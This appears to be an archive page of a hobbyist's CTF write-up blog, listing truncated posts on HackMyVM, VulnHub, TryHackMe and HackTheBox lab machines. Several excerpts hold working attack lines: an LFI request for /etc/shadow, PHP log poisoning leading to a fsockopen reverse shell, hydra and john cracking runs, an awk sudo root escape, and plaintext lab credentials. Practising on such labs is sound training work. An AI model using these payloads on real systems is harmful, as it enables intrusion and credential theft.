jabita
GET /building/index.php?page=/etc/shadow HTTP/1.1 LOL ┌──(root💀kali)-[/opt/hmv/jabita] └─# john hash -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key...
teacher
GET /access.php?id=<%3fphp+system($_GET['cmd'])%3b%3f> HTTP/1.1 writes parameter to log.php GET /log.php?cmd=php+-r+'$sock%3dfsockopen("10.10teacher.10.73",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1 ┌──(root💀kali)-[/opt/hmv/teacher] └─# nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.10.73] from (UNKNOWN) [10.10.10.122] 57378 /bin/sh: 0: cant access tty; job control turned off $ python3 -c 'import pty;pty.spawn("/bin/bash");' www-data@Teacher:/var/www/html$ ls -lash ls -lash total 5.3M 4.0K drwxr-xr-x...
b3dr0ck
b3dr0ck, THM. Bit contrived I guess but quite fun actually and a little different and therefore worth noting an aspect or two. ┌──(root💀kali)-[/opt/thm/b3dr0ck] └─# nc 10.10.151.51 9009 You use this service to recover your client certificate and private key What are you looking for? certificate Sounds like you forgot your...
Quotient
THM Quotient, Windows unquoted service path, like this Firstly, login with xfreerdp not rdesktop. Because xfreerdp works and rdesktop doesn’t. ┌──(root💀kali)-[/opt/thm/quotient] └─# xfreerdp /u:"sage" /v:10.10.160.163 [06:36:18:262] [3317:3318] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position [06:36:18:262] [3317:3318] [WARN][com.freerdp.crypto] - CN = thm-quotient Password: [06:36:25:286] [3317:3318] [INFO][com.freerdp.gdi]...
Archetype
Need to make a few notes with this. Firstly, we have MSSql server creds obtained through an unsecured SMB share: ┌──(root💀kali)-[/opt/htb] └─# cat prod.dtsConfig <DTSConfiguration> <DTSConfigurationHeading> <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/> </DTSConfigurationHeading> <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String"> <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue> </Configuration> </DTSConfiguration> Now we use Impacket...
Ermahgerd
Well, it’s been 3 MONTHS since my last hacking post. Excuses, excuses I enrolled in a (free!) Undergraduate Certificate in Applied Technology. Why? Well, it was FREE. Also, I have absolutely no qualifications in technology at all, and I thought maybe it would be a good idea to get one,...
Plotted-TMS and ORETNOM23
There is a new TryHackMe ‘room’ (I still hate that term) called Plotted-TMS. This post is sort of about that, but not really. First, let’s get the Plotted-TMS bit out of the way. I have had a quick look at it but it’s under-provisioned on the free tier so it...
HackMyVM: Corrosion3
I got root blood on the new HackMyVM Medium rated machine Corrosion3. That is all. Writeup later.
2022-02-18 13:12:43 ordnaryday got user
2022-02-18 13:12:12 ordnaryday got firstroot
2022-02-18 10:25:02 d4t4s3c 👑 got firstuser
2022-02-18 08:19:46 Proxy got submission
THM: Dear QA
This was Dear QA from THM, an Easy rated “reverse engineering and exploit development” challenge. I’m not very good at these so I struggled a bit but got it done. Binary We were given a binary to inspect: DearQA.DearQA ┌──(root💀kali)-[/opt/thm/dearqa] └─# file DearQA.DearQA DearQA.DearQA: ELF 64-bit LSB executable, x86-64, version...
HackMyVM: Nightfall/Nightfail
I’ve done a couple more HackMyVM boxes and one thing on THM since I last wrote anything but I only want to write about one of them, and that’s Nightfall from HMV. Ports FTP and SSH only: PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD | ftp-anon: Anonymous FTP login...
HackMyVM: Talk & Speed
I’ve done a couple more HackMyVM boxes: Talk and Speed. Talk is Easy rated, Speed is Medium. Talk Talk was a webapp called chatME which we can find here and if we download it then it doesn’t appear to have any input sanitation so is probably open to SQLi. ┌──(root💀kali)-[/opt/hackmyvm/talk]...
HackMyVM: Superhuman, Brain and Eyes
I’ve done a few more HackMyVM boxes: Superhuman, Brain and Eyes. Superhuman and Brain were Easy rated, Eyes is Medium. Superhuman This was essentially weaponised guessing, followed by GTFOBins privesc (I think, I didn’t take notes). The only interesting (?) command was this one: ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.63/salome_and_FUZZ.zip -fc...
HackMyVM: University
I got bloods (User and Root) on the new HackMyVM easy rated machine University. No write-up yet so I don’t spoil it. That is all.
HackMyVM: Hopper
This is Hopper. It’s Medium rated, I liked it (a lot), and I didn’t manage it all on my own. There are some important learnings here. Ports SSH and HTTP only. HTTP Fuzzing reveals our first target: http://10.10.10.54/advanced-search/. The page says: Welcome to the private search Here you will be...
HackMyVM: Texte
This is Texte. It’s Medium rated, and it was pretty great. Ports SSH and HTTP only. HTTP The frontpage has a simple UI to upload a file, and says: Dont upload .PHP FILES! STOP BITCHING. Lol. I run a dirsearch, but there’s nothing else. I try a text file and...
HackMyVM: Breakout SMB note
I did Coming Soon, Method and Breakout from HackMyVM, but I really only want to write about Breakout, and only one specific part of it. SMB The box relies on obtaining a username via SMB enumeration. You should be able to do it with enum4linux, but that’s not working for...
HackMyVM: Secrets
I had a few days off, because I was away with no access to a PC. Now I’m back. This is Secrets. It’s Medium rated. Ports SSH and HTTP only. HTTP The frontpage says: I have to tell you a secret… And there is a comment: written by brad So...
HackMyVM: May
This is May. It’s Medium rated. Ports SSH, HTTP and Webmin on Port 10000. HTTP nmap says: http-title: Did not follow redirect to http://may.hmv So I add that to /etc/hosts. I visit the homepage and get this: admin: Web is under construction. Use Intranet. marie: Where are now the keys?...
HackMyVM: Beloved
This is Beloved. It’s Easy rated. Ports Just SSH and HTTP only. HTTP It’s wordpress, so we need wpscan. Kali hates wpscan for some reason; it used to work but now no dice. Presumably some update killed it: ┌──(root💀kali)-[/opt/hackmyvm/beloved] └─# wpscan -h Traceback (most recent call last): 12: from /usr/bin/wpscan:25:in...
HackMyVM: Gift, Pwned, Connection and Suidy
A four box multi-event. lol. Gift SSH and HTTP. HTTP says: Dont Overthink. Really, Its simple. ┌──(root💀kali)-[/opt/hackmyvm/gift] └─# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.24 -I Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes...
HackMyVM: Confusion and Family2
A double helping this evening; two Medium machines from HackMyVM. We have Confusion and Family2. Family2 This will be brief, because it wasn’t super hard (or anything really new). Lots of ports but almost all irrelevant. Hit up the website for http://10.10.10.14/nicegiftformybaby ┌──(root💀kali)-[/opt/hackmyvm/family2] └─# cat nicegiftformybaby | xxd -r >...
HackMyVM: Condor
This is Condor. It’s Medium rated. Ports Just SSH and HTTP only, points to a web shell somehow. HTTP This is an exercise in enumeration. dirsearch gives us not much, but it does give this: [04:58:11] 200 - 20B - /cgi-bin/test.cgi This is pointing at shellshock, but the cgi isn’t...
HackMyVM: Government
I’ve been doing a couple of VMs from HackMyVM lately, and this was one of them. This is Government. It’s Medium rated. Ports Lots, lemme just dump my rustscan real quick: [~] The config file is expected to be at "/root/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 10.10.10.12:21...
THM: Road
This is THM: Road. Inspired by a real-world pentesting engagement Medium rated. Ports SSH and HTTP, we’ll assume we’re looking to compromise a website. Clicking around on the site we have a website for a courier company, we can register an account: POST /v2/admin/reg.php HTTP/1.1 Host: 10.10.55.104 User-Agent: Mozilla/5.0 (X11;...
Vulnhub: JANGOW: 1.0.1
This is JANGOW: 1.0.1 from VulnHub. Difficulty: Easy The secret to this box is enumeration! Did I ever mention I hate old kernel exploits? Yeah well this one works: https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2 ┌──(root💀kali)-[/opt/scripts] └─# updog -p 443 [+] Serving /opt/scripts... * Running on all addresses. WARNING: This is a development server. Do...
Vulnhub: Earth
This is THE PLANETS: EARTH from VulnHub. Difficulty: Easy Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience. Let’s go. PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.6 (protocol...
THM: Frank & Herby
It’s been a month; really. What have I been doing in all this time? Stuff, but nothing worth noting. I’ve done some VulnHub boxes, some RootMe stuff, a bit of THM and a few other things but nothing worth making any particular notes about. But, this one was a bit...
THM: Masterminds
Long time no post. I have being doing some stuff, but nothing too enthralling or particularly worth recording. With a lack of new content on VulnHub and interesting new content on THM, I’ve been having a bit of a look at Root-Me. This however, is about the new THM room...
THM: VulnNet2 Node
I decided to run back at a THM room I signed up for a long time ago but didn’t complete at the time. Here’s VulnNet2 Node. It’s easy rated but it’s not that easy; it’s also quite ‘realistic’, which I appreciate. Ports 8080 only; that’s a HTTP port running Node.js...
THM: Empline
Well after I wrote yesterday there hadn’t been anything good on THM for a bit they came and released Empline. And it is good. Medium rated. Ports My first scan brought up HTTP and SSH only. A later scan - after the box had been running for longer - added...
HACKABLE: III
There has been nothing good on THM for a little while now, so I’m working back through some older Vulnhub machines. Not that this is particularly old, but whatever. I had looz in my list so I thought I might do that; once I booted it up I remembered that...
FALL
I saw a few people mention DIGITALWORLD.LOCAL: FALL on the VulnHub discord so thought I would give it a go. Ports A few here; mostly for distraction I guess? SSH HTTP SMB (139/443) HTTPS MYSQL on 3306, and Cockpit on 9090 I checked that mysql wasn’t accessible and there was...
Beezlebub & Vikings
I did BEELZEBUB: 1 and VIKINGS: 1 from VulnHub. Ports Both of these boxes were HTTP and SSH only; I’ll mention Beelzebub first since it is freshest in my mind. HTTP Doing a GET on /index.php seemingly returns a 404 but hidden in the source code for that page is...
Updates 10 September
Long time no post eh. What have I been up to? Can’t remember lol. I did Horizontall from HackTheBox. I did a few crackmes. I did some stuff from THM. I tried to do Darkhole 2 from VulnHub but I couldn’t connect to it from my Kali VM. Whatever. Oh,...
Vulnhub: EVILBOX: ONE
This is EVILBOX: ONE from VulnHub. I’ve been busy, super tired and yeah whatever let’s make excuses. Nah. This box is easy rated and it is genuinely easy. Ports HTTP and SSH. HTTP Quick bit of feroxbusting: ┌──(root💀kali)-[/opt/vulnhub/evilbox] └─# feroxbuster -u http://192.168.1.92 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 200 -C 403 -x txt,php,log,bak...
Vulnhub: HACKER KID: 1.0.1
This is HACKER KID: 1.0.1 from VulnHub. I started this quite a while ago but didn’t finish it; now I have and this is how. I totally cheated doing this too by the way. Ports We’ve got DNS, HTTP on 80 and another HTTP port on 9999. Shortcut The quick...
Vulnhub: CHRONOS: 1
This is CHRONOS: 1 from VulnHub. It’s rated Medium, it’s by AL1ENUM and it’s very good, so give it a go. Ports SSH and two HTTP ports: 80 and 8000. HTTP At the main website, we have a page displaying the date and time. Looking at Burpsuite, we can see...
Vulnhub: THOTH TECH: 1
This is THOTH TECH: 1 from VulnHub. There is no information about this box. I’ve been banging on a few and not getting them completed lately so not many writeups. This one was easy and will be brief. I did complete the latest HTB machine Previse the other day but...
Vulnhub: CORROSION: 1
This is CORROSION: 1 from VulnHub: A easy box for beginners, but not too easy. Good Luck. Ports SSH and HTTP only. HTTP python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.108 Dirsearch turns up /tasks/ which contains tasks_todo.txt. It says: Tasks that need to be completed Change permissions for auth log Change port 22...
Vulnhub: FUNBOX: SCRIPTKIDDIE
This will be brief. It’s FUNBOX: SCRIPTKIDDIE from VulnHub: As always, it’s a very easy box for beginners. Ports Quite a few: PORT STATE SERVICE REASON 21/tcp open ftp syn-ack ttl 64 22/tcp open ssh syn-ack ttl 64 25/tcp open smtp syn-ack ttl 64 80/tcp open http syn-ack ttl 64...
Vulnhub: FUNBOX: UNDER CONSTRUCTION!
This will also be brief. It’s FUNBOX: UNDER CONSTRUCTION! from VulnHub: As always, it’s a very easy box for beginners. Ports This one has SSH, HTTP and various mail ports - for SMTP, POP3 and IMAP. We’re interested in the web stuff. HTTP At http://192.168.1.78/catalog/ we find osCommerce Online Merchant...
It does work!
Away I was away again but I’m back; I’ve still been doing stuff so I’ll probably write some of it up. Anyway. New boxes on Vulnhub - I downloaded HACKER KID: 1, which was 4.7Gb(!) It says: Difficulty: Easy/Medium (Intermediate) This box is OSCP style and focused on enumeration with...
THM: Fowsniff and tomghost
THM: Stuff I’ve been doing a little bit of blue-teaming learning but I wanted to feel like I’d achieved something so I ran through Fowsniff and tomghost. I don’t have much to say about Fowsniff, although I will record the telnet commands used to connect to the POP3 server: ┌──(root💀kali)-[/opt/thm/fowsniff]...
THM: Cold VVars
THM: Cold VVars This is Cold VVars from THM. It’s Medium rated and I barely knew what was going on - I had to get some hints. Ports This has SMB plus two HTTP ports, on 8080 and 8082. We’re going to exploit a login page with XPath Injection. XPath...
Vulnhub: MOMENTUM: 2
I was away again; but this time I didn’t even have a laptop. Still, I try to do something every day so I did a bit of OverTheWire on my phone. It’s hard to do some of it where you’re expected to resize a terminal window to take advantage of...
THM: Git and Crumpets (and Harder, a bit)
THM: Git and Crumpets This is Git and Crumpets from THM. It’s Medium rated. For the avoidance of any doubt: I generally don’t publicise my writeups, and this is no exception. Ports Well; hard to say. SSH and HTTP certainly; rustscan doesn’t like it and nmap isn’t super keen either...
THM: Couch
THM: Couch This is Couch from THM. It’s Easy: Hack into a vulnerable database server that collects and stores data in JSON-based document formats, in this semi-guided challenge. This will be brief, because I’m only interested in the privesc (which wasn’t guided). Linpeas We’ve SSH’d in as atena and I...
Vulnhub: COFFEE ADDICTS: 1
Yesterday evening I did Explore from HTB but that’s a new machine so no writeup. It was pretty neat though. So, instead of that here is: COFFEE ADDICTS: 1 This is COFFEE ADDICTS: 1 from VulnHub. Our coffee shop has been hacked!! can you fix the damage and find who...
Vulnhub: RIPPER: 1
RIPPER: 1 This is RIPPER: 1 from VulnHub. This is a vulnerable linux box focused on web application testing along with showing the importance of enumeration. There are three users you needs to compromise to read the root flag. Difficulty: Easy-Medium. Let’s go. Oh I also did Gaara and I’ve...
Updates 24 June 2021
Away I was away for a few days with just an old laptop setup with Kali as the OS. It didn’t have enough grunt to run any VMs, so it was THM only. Since there wasn’t much new I went and did a few older CTFs that I hadn’t done...
Vulnhub: TECH_SUPP0RT: 1
TECH_SUPP0RT: 1 This is TECH_SUPP0RT: 1 from VulnHub. Difficulty: Easy Background: The machine acts as a server setup by pop-up scammers which is under maintenance. Let’s go. Ports HTTP, SSH and SMB. Let’s begin with SMB. SMB We have anonymous login (I use smbclient) and just one file: enter.txt. ┌──(root💀kali)-[/opt/vulnhub/tech_support]...
Vulnhub: HACKSUDO: PROXIMACENTAURI
HACKSUDO: PROXIMACENTAURI This is HACKSUDO: PROXIMACENTAURI from VulnHub. Box created by hacksudo team members vishal Waghmare , Soham Deshmukh This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh) and Website (https://hacksudo.com) Let’s go. Ports HTTP only. Well, I guess we...
Vulnhub: VULNCMS: 1
VulnCMS This is VULNCMS: 1 from VulnHub. We’ve got some new machines, so let’s go. Ports We’ve got SSH on 22; a website on 80. And then we’ve got Wordpress on 5000, Joomla on 8081 and Drupal on 9001. Where shall we start? Wordpress? nmap says: _http-generator: WordPress 5.7.2 That’s...
THM: That's The Ticket
THM: That’s The Ticket This is That’s The Ticket from THM. It’s Medium rated and says: IT Support is going to have a really bad day today, but don’t think they’re stupid! They have really strict firewalls! Using the IT support portal try and make your way into the admin...
THM: Mustacchio
THM: Mustacchio This is Mustacchio from THM. It’s easy rated with no hints; let’s go. Ports SSH, a ‘normal’ HTTP port (i.e. on Port 80) and nginx on port 8765. Normal HTTP Let’s start there. It’s a blog about mustaches; not much to see. Some enumeration leads us to /custom/js,...
Update 11 June 2021
CAP I did CAP from HTB. It’s active so no writeup. It’s probably the easiest modern HTB machine I’ve done. No new releases from VulnHub lately. I also did Basic Pentesting and yes it was basic. We have SSH, SMB and a webserver. We’ve got anonymous access on the SMB...
THM: Cat Pictures
Cat Pictures I made a forum where you can post cute cat pictures! Easy rated. This is Cat Pictures from THM. Ratings are weird; I did Linux Server Forensics the other day which is Medium rated; I’m not going to bother writing it up because it was so straightforward. Anyway....
THM: Prime et al
Updates I’ve just done Love on HTB; no writeup obviously - it’s still an active box. I also did Prime 1 from VulnHub the other day and ermagerd this is lazy but…. ## Ping the box, make sure it's up ┌──(root💀kali)-[/opt/vulnhub/prime1] └─# ping 192.168.1.237 PING 192.168.1.237 (192.168.1.237) 56(84) bytes of...
THM: Tribute et al
Updates I’ve just done Knife on HTB; no writeup obviously - it’s only a day old. I also finished MusicalStego which I can barely remember even starting, and then I did Tribute, which I don’t remember joining. I’m not going to write much, just a brief mention about Tribute. The...
Vulnhub: HACKSUDO: Fog and Blogger
HACKSUDO: Fog and Blogger I’ve recently done HACKSUDO: Fog and Blogger from Vulnhub but I’m struggling for motivation a bit at the moment so this will be pretty brief. Blogger first. Ports SSH and HTTP. HTTP This is basically a hidden Wordpress installation; it’s at http://blogger.thm/assets/fonts/blog/ Note we were told:...
THM: VulnNet: Roasted
THM: VulnNet: Roasted This is VulnNet: Roasted from THM. It’s rated as Easy but it’s … drum roll … Windows. Which I’m not very experienced at. I mean I use it all the time, but hacking? Not so much. Just as an aside, I’ve had so much trouble getting recent...
Vulnhub: ALFA: 1
ALFA: 1 This is ALFA: 1 from Vulnhub. It’s rated as Medium, and appears on the NetSecFocus Trophy Room list. I had been doing the DriftingBlues series; I’d done 7 and 6 then the privesc on 5 was like super CTF-ish and I was like meh and then I started...
THM: VulnNet: Internal
THM: VulnNet: Internal This is VulnNet: Internal from THM. It’s rated as Easy/Medium rated, and says: VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set...
Vulnhub: DriftingBlues6
DriftingBlues6 Since DriftingBlues7 was so quick I rolled into DriftingBlues6 and whaddya know - two successful Dirty Cow privescs in two days. What’s the world coming to? Ports HTTP only. HTTP robots.txt says: dont forget to add .zip extension to your dir-brute Okey dokey. It also disallows /textpattern/textpattern. ┌──(root💀kali)-[/opt/vulnhub/driftingblues6] └─#...
Vulnhub: DriftingBlues7
DriftingBlues7 Since I couldn’t get any more of the SunCSR boxes to run and there’s nothing new on THM, I took a shot at DriftingBlues7 on VulnHub. It says it is easy and they weren’t kidding; it took me 10 minutes. Ports Lots: PORT STATE SERVICE 22/tcp open ssh 66/tcp...
Vulnhub: Sumo and Geisha
Sumo and Geisha I decided to do some more of the SunCSR Team boxes on VulnHub because I saw someone talking them up; I had done a couple already. It wasn’t easy though - although not for the reasons you might think. VMWare I used to use VMWare for my...
THM: Unstable Twin
THM: Unstable Twin This is Unstable Twin from THM. It’s medium rated, and says: A Services based room, extracting information from HTTP Services and finding the hidden messages. I’m not going to writeup the whole thing, because it’s got stego and I hate stego. It’s web to find some SSH...
Vulnhub: SHENRON: 3
SHENRON: 3 This is SHENRON: 3 from Vulnhub. It says that it is ‘beginner’. Well some days I still feel like a beginner, so okey dokey. Actually I think that’s about right for the foothold, not so sure for the privesc. Anyway! Ports HTTP only. Web It’s wordpress, with a...
Vulnhub: MOMENTUM: 1
MOMENTUM: 1 This is MOMENTUM: 1 from Vulnhub. It says that it is ‘easy/medium’; ok. Ports SSH and HTTP only. Web The basic dirsearch: python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.211 shows me /js and not much else. Javascript isn’t usually very interesting in a CTF but I look anyway; we have this:...
Vulnhub: HACKSUDO: SEARCH
HACKSUDO: SEARCH This is HACKSUDO: SEARCH from Vulnhub. It says: This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/7ujQrt393b) Ports SSH and HTTP only. Web The basic dirsearch: python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.209 gives me a few things, including this: [06:23:34] 200 -...
THM: VulnNet: dotjar
VulnNet: dotjar This is VulnNet: dotjar from THM. It’s medium rated, and says: A new machine means a new web implementation. Foothold should be rather easy-going as long as you connect the dots. Privilege escalation might depend on your Java knowledge, don’t worry though, I’m rather a person who avoids...
Vulnhub: PYLINGTON: 1
PYLINGTON: 1 This is PYLINGTON: 1 from Vulnhub. It doesn’t have a rating but I’m going to say it was easy. Ports SSH and HTTP, and running on Arch Linux. That’s interesting, isn’t it? No? Whatever. Web We have an online python interpreter but in order to use it we...
Vulnhub: BLUEMOON: 2021
BLUEMOON: 2021 This is BLUEMOON: 2021 from Vulnhub. It is easy rated and I picked it to do because someone on the Vulnhub discord was looking for a write-up, which made me think maybe it was challenging. After that - and before I got a chance to do it myself...
Vulnhub: PHINEAS: 1
PHINEAS: 1 This is PHINEAS: 1 from Vulnhub. It says: a easy/medium web exploiting machine, with internal pivoting and CVE / RCE Let’s go. Ports We’ve got four open ports: SSH on port 22 HTTP on port 80 RPCBind on port 111, and MySQL/MariaDB on 3306 3306 If we try...
Vulnhub: HACKSUDO: 3
HACKSUDO: 3 This is HACKSUDO: 3 from Vulnhub. It says: This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh), and Find the user.txt and root.txt flag submit it to the mybox channel on Discord and get chance to get hacksudo machine hacking...
Vulnhub: SHENRON: 2
SHENRON: 2 This is SHENRON: 2 from Vulnhub. It says difficulty is ‘beginner’. It took me about an hour. Ports SSH on 22, plus HTTP on ports 80 and 8080 - hey, that’s a lot like the last one! HTTP/80 Looks to be a pretty basic template page with nothing...
Vulnhub: HACKSUDO: 1.0.1
HACKSUDO: 1.0.1 I was away for a couple of days. I try to do some practice everyday; the first day I did SimpleCTF from THM on my phone (I had no computer with me) which was kind of a pain in the ass but I got it done; next day...
Vulnhub: HACKSUDO: ALIENS
HACKSUDO: ALIENS This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh) This is HACKSUDO: ALIENS from Vulnhub. I also did COLDDWORLD: IMMERSION which was LFI to SSH login to editing a python script. I don’t have anymore to say about that. Ports...
THM: VulnNet: Node
VulnNet: Node After the previous breach, VulnNet Entertainment states it won’t happen again. Can you prove they’re wrong? Easy rated. This is VulnNet: Node from THM. the Node refers to node.js, and this box has a node deserialization foothold. This isn’t a standard write-up; it’s all about the foothold. Ports...
THM: SafeZone
SafeZone CTF Designed by CTF lover for CTF lovers Medium rated. This is SafeZone from THM. It was pretty enjoyable; here’s what happened. Ports SSH and HTTP only. HTTP At index.php we have a login page but we have no credentials. There is a register.php where we can register an...
THM: Debug
Debug Linux Machine CTF! You’ll learn about enumeration, finding hidden password files and how to exploit php deserialization! Medium rated. This is Debug from THM. Everything seems to have been kicking my ass lately (yes, I prefer the American spelling for that expression). I’ve also been a bit lacking in...
Update March 24
Update I haven’t written a post for a bit; been feeling a bit burned out. Still doing something productive every day - no zero days. What have I done since I last wrote? HTB Time. This is an active machine, so no writeup just yet. THM Vulnet. This is basically...
HTB: Blocky
Blocky I’m getting out of order now. Whoops. Ports This has got: 21/tcp open ftp ProFTPD 1.3.5a 22/tcp open ssh OpenSSH 7.2p2 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 8192/tcp closed sophos 25565/tcp open minecraft Minecraft 1.11.2 FTP ProFTPD 1.3.5 (before 1.3.5a) had a horrible vulnerability; this version does not....
HTB: Valentine
Valentine Valentine was next after Grandpa. I’m pretty sure I once fell asleep watching the start of the Ippsec walkthrough of this but I didn’t remember anything about it. When it booted I thought I have a feeling this is SLQi. Lol. Ports SSH plus HTTP and HTTPS only. HTTP...
HTB: Grandpa
Grandpa Grandpa was next after Irked; I went in blind. Ports HTTP only. IIS 6.0 Nmap says: PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH |_ Potentially...
HTB: Irked
Irked Irked was next after Shocker; I went in blind. Ports This box had four unusual ports and no standard ports. We had: 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 46013/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd So it’s pretty much just UnrealIRCd, whatever that is....
HTB: Shocker
Shocker Shocker was not technically next in line; Beep was. I have started Beep but I’ll return to that later. I didn’t know what this was but I guessed from the name. Ports HTTP and SSH on a non-standard port: 2222. HTTP On the front page of the webserver is...
THM: Broker
Broker Paul and Max use a rather unconventional way to chat. They do not seem to know that eavesdropping is possible though… Medium rated. This is Broker from THM. Let’s go! Ports SSH, plus ports 1883, 8161 and 44885. What are those? 8161 At port 8161 we find ActiveMQ version...
HTB: Optimum
Optimum Optimum was after Nibbles; I went in blind and struggled a bit. Ports HTTP only. Well, that’s a start. HTTP On the webpage we see something called “HttpFileServer 2.3” is running; we can searchsploit this and find it’s trivially exploitable. There is a python exploit: python3 /opt/htb/optimum/49125.py 10.10.10.8 80...
THM: Wekor
Wekor CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;) Medium rated but surely that description gives a lot away? This is Wekor from THM. Ports SSH and HTTP only. VHOSTS Since we already know there is a VHOST/subdomain to find, I’ll run WFUZZ: wfuzz...
HTB: Nibbles
Nibbles After Bashed is Traceback but I’ve done that before; next is Nibbles. Ports SSH and HTTP only. HTTP The frontpage just says Hello world! but in the page source there is a comment about /nibbleblog, so we go there. It’s running a CMS called nibbleblog; searchsploit says there are...
HTB: Bashed
Bashed Next after Netmon is Bashed; I don’t know anything about it. I do wonder if it’s shellshock though, just based on the name. Ports HTTP only. Makes it easy, no? HTTP On the webpage we get some information about something called phpbash, and there is a link to a...
HTB: Netmon
Netmon In terms of pwns it goes Devel > OpenAdmin > Netmon but I’ve already done OpenAdmin so this is Netmon. Looking at the IP it’s fairly high (10.10.10.152), I reckon it is from not long before I joined HTB. I’ve never tried it before. Ports There are lots of...
HTB: Devel
Devel Following on from Blue in number of pwns is Devel. I’m going in blind. Ports Just FTP and HTTP on this one. The detail scan says anonymous FTP is allowed and the webserver is Microsoft IIS httpd 7.5. Shell We can login to FTP and put files. I’m far...
THM: Team
Team Beginner friendly boot2root machine It is aimed at beginners as I often see boxes that are “easy” but are often a bit harder! Whilst not difficult by any means, I still think this one will trip a few noobs up. This is Team from THM. Ports FTP, SSH and...
HTB: Blue
Blue Following on from Legacy in number of pwns is Blue. I have heard of this one, and the name is a giveaway. Is it pretty much a clone of Legacy? Ports Not exactly; there are a bunch more ports for a start: 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp...
HTB: Legacy
Legacy Following on from Jerry in number of pwns is Legacy. I go in blind. Ports It’s SMB only, on 139/445. Looks like Windows. SMB Given what this is, let’s try a special nmap scan: ┌──(root💀kali)-[/opt/htb/legacy] └─# nmap -p445 --script smb-vuln-ms17-010 10.10.10.4 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05...
HTB: Jerry
Jerry Next cab off the rank when sorted by Pwnage is Jerry (after Lame). Again, I went into this one blind. Ports We’ve got one port only, 8080. This appears to be Windows, based on the TTL. 8080 We’ve got Apache Tomcat 7.0.88, and as we will soon see it’s...
HTB: Lame
Sorting I signed up for VIP and ordered the retired machines by owns, descending. I figured this was a reasonable proxy for difficulty, ignoring the user supplied ratings. That meant the first box was Lame. I have heard of it but I’ve never done it and I don’t know anything...
Subscriptions and directions
Vulnhub It’s been nearly 3 months since anything new has been uploaded to Vulnhub; I think it’s safe to safe that OffSec don’t consider it a priority. I did look into Proving Grounds, but the free tier is just Vulnhub boxes that they host for you - lol. The paid...
THM: JPGChat
JPGChat Exploiting poorly made custom chatting service written in a certain language… The picture attached with this new room is the Python symbol, so I think we can guess what the language might be. Ports SSH and port 3000. What’s that? 3000 Let’s try telnet: └─# telnet 10.10.228.16 3000 Trying...
THM: Lunizz & Friends
There are a few things I’ll (briefly) mention here. REloaded This room is dedicated for the RE challenges, each challenge has unique concepts divided in each binaries. As if now only phase 1 is added will decide about phase 2 on response. This was REloaded from THM. There were five...
THM: Magician
Magician This magical website lets you convert image file formats. This is Magician from THM. It’s easy rated, but it wasn’t that easy. Ports FTP and two HTTP ports, on 8080 and 8081. FTP Anonymous login is available, and we get this message: ──(root💀kali)-[/opt/thm/magician] └─# ftp magician Connected to magician....
THM: Res and Watcher
Watcher I did watcher, it was okay but nothing to write about. We had LFI to get FTP creds, upload a PHP reverse shell using the FTP account then include it for RCE, then a few different things to move between users but nothing exciting. Res Hack into a vulnerable...
THM: En-Pass
En-pass Get what you can’t Think-out-of-the-box Yeah, if you say so. This released yesterday and I haven’t completed it; I probably won’t. It’s SSH and HTTP only, and you do a series of repetitive but not very interesting dirbuster/gobuster/dirsearch whatever to find an encrypted private SSH key, at: /web/resources/infoseek/configure/key The...
THM: Classic Passwd
Classic Passwd Practice your skills in reversing and get the flag bypassing the login david@DESKTOP-ROP5TSG:/mnt/c/Temp$ gdb ./Challenge.Challenge GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1 Copyright (C) 2018 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it....
Vulnhub: HACKNOS: OS-HAX
HACKNOS: OS-HAX Difficulty: Intermediate This is HACKNOS: OS-HAX from Vulnhub. Image from website > exiftool > hidden directory > brainfuck password > wordpress login > edit 404.php > shell > privesc www-data@jax:/dev/shm$ su web su web Password: Hacker@4514 $ sudo -u root /usr/bin/awk 'BEGIN {system("/bin/sh")}' sudo -u root /usr/bin/awk 'BEGIN...
THM: toc2
